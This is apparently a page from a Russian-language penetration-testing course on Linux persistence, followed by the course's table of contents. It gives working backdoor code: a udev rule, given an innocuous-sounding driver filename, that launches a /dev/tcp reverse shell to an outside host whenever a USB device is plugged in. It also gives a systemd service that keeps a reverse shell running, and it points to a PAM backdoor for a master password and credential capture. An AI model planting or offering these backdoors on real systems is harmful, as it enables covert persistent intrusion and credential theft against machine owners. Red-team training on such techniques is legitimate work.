Внедрение бэкдоров аутентификации на основе PAM

PAM (Pluggable Authentication Modules, подключаемые модули аутентификации) — разделяемые библиотеки, используемые для
реализации произвольных методов аутентификации в виде единого API. Внедрение вредоносного модуля позволяет добавить
мастер-пароль и перехватить учетные данные. Пример бэкдора: https://github.com/ociredefz/pambd/

Внедрение бэкдоров в драйверы

Для запуска бэкдора при подключении какого-либо устройства можно использовать каталог /etc/udev/rules.d/, в котором хранятся правила для обработки событий устройств. Изменяя эти правила, можно переименовать устройство, настроить права доступа к нему, но самое главное, что нас интересует — выполнить скрипт при подключении устройства.

RSHELL="0<&196;exec 196<>/dev/tcp/192.168.0.177/9001; sh <&196 >&196 2>&196"
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

В таком случае при подключении к машине USB-устройства порт выполнится скрипт RSHELL для предоставления доступа вашей машине в сети.

Внедрение бекдоров в службы автозапуска (использование systemd)

systemd — это системный инициализатор и менеджер служб для операционных систем Linux. Он является заменой для более старой системы инициализации SysVinit и предоставляет целый набор функциональных возможностей для управления и контроля запуска служб и процессов в Linux-системе.

Systemd также имеет ряд дополнительных функций, включая событийную систему, журналирование и мониторинг процессов,
управление сетевыми интерфейсами и сетевыми соединениями, управление контейнерами и многие другие.

Пример создания сервиса:

[Unit]
Description=Backdoor
After=network.target ssh.service

[Service]
Type=simple
PIDFile=/var/run/backdoor.pid
ExecStart=sh -i >& /dev/tcp/192.168.0.177/9001 0>&1"
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target

Расположить его в файле:

/lib/systemd/system/backdoor.service

Запустить его командами:

sudo systemctl enable backdoor.service
sudo systemctl start backdoor.service

Общее описание

A01:2021 – Broken Access Control

Общие требования

Система хранения информации

Структура информации при пентесте

Поиск хостов и открытых портов

Поиск доменных имен

OSINT

Shodan.io, Google

Email рассылки

Фаззинг

Направления

Тестовые стенды

Уязвимости механизмов авторизации

Уязвимости инъекции команд ОС

Уязвимости контроля доступа

Файлы и каталоги

SQL-инъекции

Внедрение внешних сущностей XML

Межсайтовый скриптинг (XSS)

Burp

Nikto, nuclei и др.

HTTP request smuggling

Общая информация

Тестовый стенд

Версия сервиса и ОС

NMAP

NMAP Script Engine (NSE)

SMB VNC SMTP

Прослушивание паролей

Общая информация

Управление данными

Exploits

Payloads

Meterpreter

Автоматизация MSF

Общая идея

Пример атаки

Поиск email

setoolkit

Клонирование сайта

Общая информация и практика

Получение легитимного доступа

Внесение изменений в легитимные механизмы доступа

Внесение изменений в сервисы и внешние программы в ОС

Внесение изменений в ядро ОС и в предустановленные службы на нем

Внедрение бэкдоров аутентификации на основе PAM

Общая информация

Пример nmap

Эксплуатация ошибок администрирования ОС Linux

Практика

Общая информация

Примеры атак

Проброс сетевого трафика

Утилиты для проброса трафика

Использование внешних утилит для скрытия трафика

Практика проброса трафика

Общая информация

Поиск Win машин и эксплуатация Smb уязвимости

Обнаружение Windows машин

Атаки первичного доступа

Повышение привилегий

Практика первичного доступа

Практика повышения привилегий

Общая информация

Пример захвата управления

Уязвимости

Сбор информации об объектах

Миссконфигурация сервисов в AD

Практика

Общая информация

Подготовка и сравнение нагрузок

Увеличение скрытности

Ротация IP

Материалы

Общая информация

Инфраструктура

SIEM (ElasticSearch)

Системы аудита и внешний периметр

Email и облака